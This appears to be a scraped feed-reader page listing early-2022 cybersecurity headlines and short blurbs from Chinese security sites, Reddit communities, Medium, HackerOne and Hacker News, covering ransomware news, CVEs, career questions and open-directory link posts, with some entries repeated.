    沃达丰葡萄牙分公司遭受网络攻击,导致该国通讯和电视服务严重中断。  ( 1 min )
    慢雾:美国执法部门破获 2016 年 Bitfinex 被黑案件细节分析
    一个疑点:真正攻击 Bitfinex 的盗币黑客是谁?  ( 1 min )
    NetWalker勒索软件成员被判80个月监禁
    近期,加拿大男子Sebastian Vachon-Desjardins因参与NetWalker勒索攻击,被判处6年零八个月监禁。
    关于SSRF和多种绕过方式
    SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤。  ( 1 min )
    Puma遭遇勒索攻击致数据泄漏、微软修复48个安全漏洞|2月9日全球网络安全热点
    运动服装制造商Puma在2021年12月对其北美劳动力管理服务提供商之一Kronos发起勒索软件攻击后,遭到数据泄露。
    全球工业网络安全状况调查
    【编者按】工业组织在2021年面临重大挑战。对佛罗里达州Oldsmar供水设施、Colonial管道和JBS的网络攻击,以及Solar  ( 1 min )
    “漫游螳螂”恶意软件触角伸向欧洲
    犯罪分子能够利用偷来的照片以其他方式获得钱财,如敲诈或性骚扰等。  ( 1 min )
    以色列监控公司 QuaDream遭曝光
    “据五位知情人士透露,以色列监控公司 NSO Group 在 2021 年利用苹果软件中的一个漏洞 侵入 iPhone,同时也被一家竞争公司滥用。” 根据路透社发表的文章,“有人透露这家名为的QuaDream 是一家规模较小、知名度较低的以色列公司,它还为政府客户开发智能手机黑客工具。”QuaDream是由以色列前军官 Ilan Dabelstein 和两名前 NSO 员工 Guy Geva 和  ( 1 min )
    微软禁用ms-appinstaller 协议,以阻止恶意软件传播
    微软宣布已在Win10/11系统中暂时禁用MSIX应用程序安装器的ms-appinstaller 协议,以防被恶意软件滥用。
    请及时更新,微软2月修复48个重要漏洞,1个零日漏洞
    2022年2月8日,微软发布了一系列的漏洞补丁,共修复48 个漏洞,以及一个零日漏洞。  ( 1 min )
    《金融标准化“十四五”发展规划》发布,强化金融网络安全标准防护
    《规划》提出要强化金融网络安全标准防护。健全金融业网络安全与数据安全标准体系。 建立健全金融业关键信息基础设施保护标准体系,支持提升安全防护能力。
  • Open

    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
  • Open

    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    PrivateLoader: 众多恶意软件方案的第一步
    译者:知道创宇404实验室翻译组 原文链接:https://intel471.com/blog/privateloader-malware 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...
    重建世界:The Sandbox 任意燃烧漏洞回顾
    作者:Victory@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ 据慢雾区情报,2022 年 1 月 28 日 The Sandbox 官方发布一则 LAND 智能合约迁移的公告,但是在公告中没有说明合约具体是出了什么问题,慢雾安全团队现将简要分析结果分享如下。 项目背景 The Sandbox 是一个虚拟世...

  • Open

    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]  ( 2 min )
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Is there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge required to get started. For this reason, many people can not be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spends too much time on training and develops technical knowledge more than the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]  ( 2 min )
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]  ( 4 min )
    Malware playbooks
    I was wondering what you're malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the av. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]  ( 1 min )
    How to become a pen tester ?
    submitted by /u/AlmightyMemeLord404 [link] [comments]  ( 3 min )
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions setup on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]  ( 1 min )
  • Open

    Kubernetes for pentesters
    There’s countless article on hacking kubernetes clusters but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]  ( 1 min )
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed Url: https://root3.minerswin.de/ISO/ Urls file Extension (Top 5) Files Size .iso 102 195,47 GiB .zip 50 60,06 GiB .xz 18 14,95 GiB .ova 4 11,6 GiB .7z 2 3,7 GiB Dirs: 71 Ext: 12 Total: 323 Total: 288,59 GiB Date (UTC): 2022-02-08 23:22:22 Time: 00:00:03 Speed: 46,65 MB/s (373,2 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    http://5.196.72.204/ Url: http://5.196.72.204/ Urls file Extension (Top 5) Files Size .mkv 141 459,53 GiB .avi 99 70,71 GiB .mp4 533 51,46 GiB .tar 1 28 GiB .m2ts 33 27,8 GiB Dirs: 532 Ext: 58 Total: 4 362 Total: 683,72 GiB Date (UTC): 2022-02-08 23:08:45 Time: 00:00:07 Speed: 11,11 MB/s (88,9 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    http://www.zoppello.fr/download/ Url: http://www.zoppello.fr/download/ Urls file Extension (Top 5) Files Size .mkv 937 668,57 GiB .avi 66 68,38 GiB .mp4 61 22,63 GiB .ts 5 17 GiB .flv 17 7,07 GiB Dirs: 187 Ext: 15 Total: 1 405 Total: 790,34 GiB Date (UTC): 2022-02-08 23:07:02 Time: 00:00:04 Speed: 11,05 MB/s (88,4 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]
  • Open

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]  ( 1 min )
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0
  • Open

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »  ( 1 min )
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and i am still beginner, So i might write something wrong,Then it’s… Continue reading on Medium »  ( 3 min )
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »  ( 1 min )
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »  ( 1 min )
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »  ( 2 min )
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »  ( 2 min )
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »  ( 4 min )
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »  ( 2 min )
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »  ( 2 min )
  • Open

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »  ( 7 min )
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »  ( 8 min )
  • Open

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]  ( 2 min )
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Object Overloading
    Using an OS binary to carry out our bidding has been a tactic employed by Red Teamers for years. This eventually led to us coining the term LOLBIN. This tactic is typically used as a way of flying under the radar of EDR solutions or to bypass application whitelisting by surrounding our code in the... The post Object Overloading appeared first on TrustedSec.  ( 12 min )
  • Open

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771
  • Open

    2021年全球工业网络安全态势报告
    六方云结合2021年50篇安全态势周刊内容,详细分析全球工业安全现状,多方位感知工业安全态势,为工业安全相关责任人员提供有效的参考。  ( 1 min )
    无回显条件下的命令执行判断和利用方式研究
    渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显的命令执行点。  ( 1 min )
    FreeBuf早报 | Meta 威胁退出欧洲;网上没有免费“红包”
    Meta 威胁称,如果欧盟不允许该公司的美国运营、应用程序和数据中心分享欧盟用户数据,将考虑退出欧洲。  ( 1 min )
    X站钓鱼邮件应急响应案例分析
    应急响应文章很多,但如何使用SANS、NIST框架模型落地应急响应文章略少,仅以个人观点针对当前X站钓鱼邮件案例进行简单模型化分析  ( 1 min )
    服务全球100强的公司Morley遭勒索攻击,泄露大量用户信息
    泄露的数据类型包括:姓名、地址、社会安全号码、出生日期、客户识别号码、医疗诊断和治疗信息以及健康保险信息。
    上海首份《企业数据合规指引》发布
    《指引》共六章三十八条,主要对企业的数据合规管理架构与风险识别处理规范作出了规定。
  • Open

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0  ( 4 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
  • Open

    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    漫游螳螂恶意软件危及欧洲
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/roaming-mantis-reaches-europe/105596/ 漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。自2018年以来,我们一直在追踪漫游螳螂,并发表了五篇关于这项活动的博客文章: 漫游螳螂使用 DNS 劫持感...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
    SoK: 浏览器安全分析
    译者:知道创宇404实验室翻译组 原作者:Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim 摘要 Web浏览器是每个人日常生活中不可或缺的一部分。它们经常用于注重安全性和隐私敏感的事情,银行交易和检...
  • Open

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is what attackers will inject into a website to attempt to use your SEO ranking for something else not ranked otherwise that will further the attackers’ objective. They spam and destroy the website while trying to generate revenue or achieve some other goal. Due to this, generally, the website owner is completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by rearranging links that aren’t visible to the average site visitor and only crawlers/index engines can see it.  Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

  • Open

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]  ( 1 min )
  • Open

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »  ( 2 min )
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0  ( 1 min )
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0  ( 7 min )
  • Open

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »  ( 3 min )
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »  ( 3 min )
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »  ( 1 min )
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »  ( 1 min )
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »  ( 3 min )
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »  ( 1 min )
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »  ( 3 min )
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »  ( 2 min )
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »  ( 2 min )
  • Open

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]  ( 2 min )
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]  ( 1 min )
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]  ( 1 min )
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]  ( 1 min )
  • Open

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061
  • Open

    SecWiki News 2022-02-07 Review
    ML-DOCTOR:对机器学习模型推理攻击的全局性研究 by ourren 黑灰产识别与溯源 by ourren 侠盗猎车 -- 玩转滚动码(中) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-07 Review
    ML-DOCTOR:对机器学习模型推理攻击的全局性研究 by ourren 黑灰产识别与溯源 by ourren 侠盗猎车 -- 玩转滚动码(中) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0  ( 4 min )
  • Open

    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

    FreeBuf早报 | DHS将着力解决log4j漏洞问题;教育行业成2021年网络攻击重灾区
    该软件的广泛使用和易于利用使它成为一个极其严重的漏洞,而DHS的最佳实践是集中精力对log4j软件库和相关补救过程中的漏洞进行审查。  ( 1 min )
    PayBito 加密货币交易所遭受网络攻击,大量数据信息被盗
    LockBit勒索软件团伙称从PayBito加密货币交易所窃取了大量客户数据。  ( 1 min )
    多趟航班延误!瑞士Swissport空港服务公司遭勒索软件攻击
    瑞士国际空港服务有限公司(Swissport International Ltd.)遭勒索软件攻击,导致多趟航班延误。
    冬训营丨移动终端高级威胁的新挑战与对抗发现
    据公开数据统计,至2021年中,移动互联网用户规模已达到10.07 亿。  ( 1 min )
    冬训营丨威胁框架的新进展
    本文从三个方面,即新内容、新方向和新力量,介绍与分析了2021年度威胁框架ATT&CK在研究与应用方面的新进展。  ( 1 min )
    冬训营丨商用密码应用建设解决方案
    随着数字化、网络化、智能化的深入发展,大数据、云计算、区块链、AI等技术的变革,不断催生出各行业的新业态。  ( 1 min )
    微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
    自2021年1月到2021年12月,微软阻止了超过256亿次 Azure AD暴力验证攻击,并拦截了357亿封网络钓鱼电子邮件。  ( 1 min )
  • Open

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company have multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big project I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise ? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]  ( 2 min )
    Do penetration testers ever get called in at 3AM?
